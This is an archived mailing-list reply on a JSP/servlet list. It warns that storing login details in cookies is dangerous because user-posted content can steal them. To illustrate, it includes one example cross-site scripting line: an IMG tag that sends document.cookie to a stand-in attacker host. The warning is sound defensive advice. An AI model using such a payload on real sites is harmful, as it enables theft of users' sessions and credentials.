Using cookies for security can be quite dangerous, as JavaScript
subverts the protection you were likely expecting. In particular,
if it's possible for users to put content anywhere on your site,
they can have the contents of the cookie sent to them:
<IMG SRC = "http://evilsite.org/cookieReader?" + Document.cookie>
If users cannot post any content to your site, they can't do this--but
since it's subtle, and there are often inadvertant ways to post
content (an improperly written guest book) it's dangerous.
Justin
WebMacro Servlet Framework
http://webmacro.org
Quoting Pasquale Lambardi ([EMAIL PROTECTED]):
> Hi,
> I need help about the following problem:
> I used the cookies to manage a protected web site, then a cookie stores the status
>of a user,
> i.e. login and password.
> I used Apache Web Server and Apache Jserv as a Servlet engine.
> Under Netscape 4.6 it's ok.
> Under IE 5, it's ok only from my computer(i.e. local place), but it isn't ok from a
>remote site.
>
> Thanks to All,
> Pasquale
>
> ===========================================================================
> To unsubscribe, send email to [EMAIL PROTECTED] and include in the body
> of the message "signoff JSP-INTEREST". For general help, send email to
> [EMAIL PROTECTED] and include in the body of the message "help".
===========================================================================
To unsubscribe, send email to [EMAIL PROTECTED] and include in the body
of the message "signoff JSP-INTEREST". For general help, send email to
[EMAIL PROTECTED] and include in the body of the message "help".
